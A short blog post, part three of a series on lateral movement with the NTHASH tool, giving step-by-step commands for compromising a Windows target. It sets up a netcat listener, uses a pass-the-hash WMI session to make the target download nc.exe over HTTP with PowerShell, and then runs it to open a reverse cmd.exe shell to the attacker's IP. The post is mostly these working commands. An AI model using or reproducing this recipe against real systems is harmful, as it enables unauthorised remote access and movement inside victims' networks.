Oct 292019

This time, lets introduce a variant of previous article.

Rather than copying a file to a target using a remote admin$ share (which is not always available), lets have the target download a file via http.

1.Set a shell with netcat on the attacker host
nc -L -vv -p 9000

2.download a file from internet on a remote target

(remember, you are using a pth shell with proper logon details).

NTHASH-win64.exe /runwmi /server:target /binary:powershell.exe -c (New-Object System.Net.WebClient).DownloadFile(‘http:%2f%2ferwan.labalec.fr%2fuploads%2fnc.exe’,’c:\temp\nc.exe’);

Notice the %2f in place of the ‘/’ – Indeed, we need to escape this as otherwise it would be understood as command line parameter.

3.Exec netcat on target host
NTHASH-win64.exe /runwmi /server:target /binary:c:\temp\nc.exe attacker_ip 9000 -e cmd.exe

At this point you will get a shell popup in your listening netcat.

Try a simple whoami for fun.


  One Response to “Demonstrating lateral movement with NTHASH Part #3”

  1. […] lets again introduce a variant of previous article. […]

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>



Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.